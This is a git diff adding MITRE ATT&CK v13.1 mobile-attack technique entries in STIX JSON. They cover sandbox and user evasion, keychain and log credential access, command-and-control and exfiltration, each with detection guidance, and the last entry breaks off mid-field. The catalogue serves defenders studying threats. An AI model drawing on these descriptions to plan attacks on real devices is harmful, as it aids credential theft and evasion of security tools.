@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--9b5ba1f9-1270-4ac9-8daa-1862b7d7053e", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08", + "created": "2022-04-11T20:05:56.069Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1628.002", + "url": "https://attack.mitre.org/techniques/T1628/002" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary\u2019s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device. \n\nWhile there are many ways this can be accomplished, one method is by using the device\u2019s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.", + "modified": "2022-04-11T20:05:56.069Z", + "name": "User Evasion", + "x_mitre_detection": "Mobile security products may be able to detect some forms of user evasion. 
Otherwise, the act of hiding malicious activity could be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "defense-evasion", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--27d18e87-8f32-4be1-b456-39b90454360f.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--27d18e87-8f32-4be1-b456-39b90454360f.json new file mode 100644 index 0000000000000000000000000000000000000000..c95255fbad745a6592f0c5cf1373a1655d54de10 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--27d18e87-8f32-4be1-b456-39b90454360f.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--ba00f8d2-3017-4fdd-9692-f4f7125e12bd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:37:57.884Z", + "name": "Virtualization/Sandbox Evasion", + "description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors after checking for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware\u2019s behavior to disengage from the victim or conceal the core functions of the payload. They may also search for VME artifacts before dropping further payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1633) during automated discovery to shape follow-on behaviors. \n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1633) such as checking for system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for applications attempting to get `android.os.SystemProperties` or `getprop` with the runtime `exec()` commands. 
This could indicate some level of sandbox evasion, as Google recommends against using system properties within applications.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--27d18e87-8f32-4be1-b456-39b90454360f", + "created": "2022-03-30T17:51:29.550Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1633", + "external_id": "T1633" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--27f483c6-6666-44fa-8532-ffd5fc7dab38.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--27f483c6-6666-44fa-8532-ffd5fc7dab38.json new file mode 100644 index 0000000000000000000000000000000000000000..32e2de12f823c5dca5abb9dbcf412afc9de64507 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--27f483c6-6666-44fa-8532-ffd5fc7dab38.json 
@@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--de75876b-4b73-4371-a4ba-cecda03cd3c6", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--27f483c6-6666-44fa-8532-ffd5fc7dab38", + "created": "2020-06-24T17:33:49.778Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1579", + "url": "https://attack.mitre.org/techniques/T1579" + }, + { + "source_name": "Apple Keychain Services", + "url": "https://developer.apple.com/documentation/security/keychain_services", + "description": "Apple, Inc.. (n.d.). Keychain Services. Retrieved June 24, 2020." + }, + { + "source_name": "Elcomsoft Decrypt Keychain", + "url": "https://blog.elcomsoft.com/2018/12/six-ways-to-decrypt-iphone-passwords-from-the-keychain/", + "description": "V. Katalov. (2018, December 18). Six Ways to Decrypt iPhone Passwords from the Keychain. Retrieved June 24, 2020." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "AUT-11" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may collect the keychain storage data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials.\n\nOn the device, the keychain database is stored outside of application sandboxes to prevent unauthorized access to the raw data. Standard iOS APIs allow applications access to their own keychain contained within the database. 
By utilizing a privilege escalation exploit or existing root access, an adversary can access the entire encrypted database.(Citation: Apple Keychain Services)(Citation: Elcomsoft Decrypt Keychain)", + "modified": "2022-04-01T15:02:43.470Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Keychain", + "x_mitre_detection": "Mobile security products can potentially detect jailbroken devices and perform further actions as necessary.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--29e07491-8947-43a3-8d4e-9a787c45f3d3.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--29e07491-8947-43a3-8d4e-9a787c45f3d3.json new file mode 100644 index 0000000000000000000000000000000000000000..8b8cf2b554eda6eaf5f5702e5561996df812d548 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--29e07491-8947-43a3-8d4e-9a787c45f3d3.json 
@@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--abcb1e01-57be-4f32-9606-363d67531173", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--29e07491-8947-43a3-8d4e-9a787c45f3d3", + "created": "2017-10-25T14:48:17.176Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1413", + "url": "https://attack.mitre.org/techniques/T1413" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-3.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-3" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-13" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "On versions of Android prior to 4.1, an adversary may use a malicious application that holds the READ_LOGS permission to obtain private keys, passwords, other credentials, or other sensitive data stored in the device's system log. 
On Android 4.1 and later, an adversary would need to attempt to perform an operating system privilege escalation attack to be able to access the log.", + "modified": "2022-04-06T15:37:34.463Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Access Sensitive Data in Device Logs", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c.json new file mode 100644 index 0000000000000000000000000000000000000000..b952b334bd3e306af9c543ee957033246aebe299 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--535102c6-cbaa-4c5f-97e8-1dafb004c46e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T15:16:19.547Z", + "name": "Command and Scripting Interpreter", + "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, Android is a UNIX-like OS and includes a basic [Unix Shell](https://attack.mitre.org/techniques/T1623/001) that can be accessed via the Android Debug Bridge (ADB) or Java\u2019s `Runtime` package.\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0027) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Command-line activities can potentially be detected through Mobile Threat Defense integrations with lower-level OS APIs. 
This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells.\n\nApplication vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c", + "created": "2022-03-30T13:40:37.259Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1623", + "external_id": "T1623" + }, + { + "source_name": "Samsung Knox Mobile Threat Defense", + "description": "Samsung Knox Partner Program. (n.d.). Knox for Mobile Threat Defense. Retrieved March 30, 2022.", + "url": "https://partner.samsungknox.com/mtd" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49.json new file mode 100644 index 0000000000000000000000000000000000000000..d59860b3829f7eb9f20c31efdae40ffc6d99322a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--a3fe9a28-0422-4602-b6eb-7b939d99848a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:40:12.912Z", + "name": "Disable or Modify Tools", + "description": "Adversaries may disable security tools to avoid potential detection of their tools and activities. This can take the form of disabling security software, modifying SELinux configuration, or other methods to interfere with security tools scanning or reporting information. This is typically done by abusing device administrator permissions or using system exploits to gain root access to the device to modify protected system files.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can view a list of active device administrators in the device settings.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "created": "2022-04-01T18:51:13.963Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1629/003", + "external_id": "T1629.003" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8.json
new file mode 100644
index 0000000000000000000000000000000000000000..acc4635c22af2771a253264b919491073d24670d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8.json
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--499d81c3-c10a-4402-9be2-5fc04bff5654", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:43:44.687Z", + "name": "Ingress Tool Transfer", + "description": "Adversaries may transfer tools or other files from an external system onto a compromised device to facilitate follow-on actions. Files may be copied from an external adversary-controlled system through the command and control channel or through alternate protocols with another tool such as FTP.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for connections to unknown domains or IP addresses. Application vetting services may indicate precisely what content was requested during application execution.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "created": "2020-01-21T15:27:30.182Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1544", + "external_id": "T1544" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2ccc3d39-9598-4d32-9657-42e1c7095d26.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2ccc3d39-9598-4d32-9657-42e1c7095d26.json
new file mode 100644
index 0000000000000000000000000000000000000000..9dbc57debaf77042cedd5c2d18a4ae08372e31dd
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2ccc3d39-9598-4d32-9657-42e1c7095d26.json
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--072baa3c-d82d-4553-b4ce-288cca6f31c7", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2ccc3d39-9598-4d32-9657-42e1c7095d26", + "created": "2022-04-05T19:57:15.734Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1637", + "url": "https://attack.mitre.org/techniques/T1637" + }, + { + "source_name": "Data Driven Security DGA", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/", + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. This algorithm can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.", + "modified": "2022-04-05T19:57:15.734Z", + "name": "Dynamic Resolution", + "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different Domain Generation Algorithms (DGAs), constantly evolving malware families, and the increasing complexity of the algorithms. 
There are a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) Content delivery network (CDN) domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, a more general approach for detecting a suspicious domain is to check for recently registered names or rarely visited domains.", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2d646840-f6f5-4619-a5a8-29c8316bbac5.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2d646840-f6f5-4619-a5a8-29c8316bbac5.json new file mode 100644 index 0000000000000000000000000000000000000000..4dd8961f77fc1cc8cc811cca09fa8c5f2ef9a514 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2d646840-f6f5-4619-a5a8-29c8316bbac5.json 
@@ -0,0 +1,74 @@ +{ + "type": "bundle", + "id": "bundle--0f177646-b457-40d7-8319-45a4e3260711", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2d646840-f6f5-4619-a5a8-29c8316bbac5", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1477", + "url": "https://attack.mitre.org/techniques/T1477" + }, + { + "source_name": "Forbes-iPhoneSMS", + "url": "http://www.forbes.com/2009/07/28/hackers-iphone-apple-technology-security-hackers.html", + "description": "Andy Greenberg. (2009, July 28). How to Hijack 'Every iPhone In The World'. Retrieved December 23, 2016." + }, + { + "source_name": "Register-BaseStation", + "url": "http://www.theregister.co.uk/2015/11/12/mobile_pwn2own1/", + "description": "D. Pauli. (2015, November 12). Samsung S6 calls open to man-in-the-middle base station snooping. Retrieved December 23, 2016." + }, + { + "source_name": "ProjectZero-BroadcomWiFi", + "url": "https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html", + "description": "Gal Beniamini. (2017, April 4). Over The Air: Exploiting Broadcom's Wi-Fi Stack. Retrieved November 8, 2018." + }, + { + "source_name": "Weinmann-Baseband", + "url": "https://www.usenix.org/system/files/conference/woot12/woot12-final24.pdf", + "description": "R. Weinmann. (2012, August 6-7). Baseband Attacks: Remote Exploitation of Memory Corruptions in Cellular Protocol Stacks. Retrieved December 23, 2016." + }, + { + "source_name": "SRLabs-SIMCard", + "url": "https://srlabs.de/bites/rooting-sim-cards/", + "description": "SRLabs. (n.d.). SIM cards are prone to remote hacking. Retrieved December 23, 2016." 
+ } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "The mobile device may be targeted for exploitation through its interface to cellular networks or other radio interfaces.\n\n### Baseband Vulnerability Exploitation\n\nA message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi(Citation: ProjectZero-BroadcomWiFi) or other) to the mobile device could exploit a vulnerability in code running on the device(Citation: Register-BaseStation)(Citation: Weinmann-Baseband).\n\n### Malicious SMS Message\n\nAn SMS message could contain content designed to exploit vulnerabilities in the SMS parser on the receiving device(Citation: Forbes-iPhoneSMS). An SMS message could also contain a link to a web site containing malicious content designed to exploit the device web browser. Vulnerable SIM cards may be remotely exploited and reprogrammed via SMS messages(Citation: SRLabs-SIMCard).", + "modified": "2022-04-06T15:42:13.444Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit via Radio Interfaces", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2de38279-043e-47e8-aaad-1b07af6d0790.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2de38279-043e-47e8-aaad-1b07af6d0790.json new file mode 100644 index 0000000000000000000000000000000000000000..9feb53fabbace680367921eb8209928262d2832e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2de38279-043e-47e8-aaad-1b07af6d0790.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--d64dd489-ad2a-4e58-9b1b-70557f581651", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2de38279-043e-47e8-aaad-1b07af6d0790", + "created": "2017-10-25T14:48:26.890Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1423", + "url": "https://attack.mitre.org/techniques/T1423" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans from the mobile device. This technique may take advantage of the mobile device's access to an internal enterprise network either through local connectivity or through a Virtual Private Network (VPN).", + "modified": "2022-04-11T19:12:38.451Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network Service Scanning", + "x_mitre_detection": "Network service scanning can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "discovery", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2f0e8d80-4b8b-4f4a-b5cc-132afe7e057d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2f0e8d80-4b8b-4f4a-b5cc-132afe7e057d.json
new file mode 100644
index 0000000000000000000000000000000000000000..8f3c9c3191b9f457874b5deb4357f951894f2557
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2f0e8d80-4b8b-4f4a-b5cc-132afe7e057d.json
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--bb39b3e3-09e3-4a90-a096-b2397cf8e76d", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2f0e8d80-4b8b-4f4a-b5cc-132afe7e057d", + "created": "2021-09-30T18:18:52.285Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1618", + "url": "https://attack.mitre.org/techniques/T1618" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary\u2019s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device. \n\nWhile there are many ways this can be accomplished, one method is by using the device\u2019s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.", + "modified": "2022-04-11T20:06:56.032Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "User Evasion", + "x_mitre_detection": "Mobile security products may be able to detect some forms of user evasion. 
Otherwise, the act of hiding malicious activity could be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc.json new file mode 100644 index 0000000000000000000000000000000000000000..d55ef008ad09a5648149802fc61ae2ddcbb90b8f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--6b1b8127-400d-45f9-85f4-946706fab667", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "created": "2022-04-01T15:43:45.913Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1646", + "url": "https://attack.mitre.org/techniques/T1646" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-29" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.", + "modified": 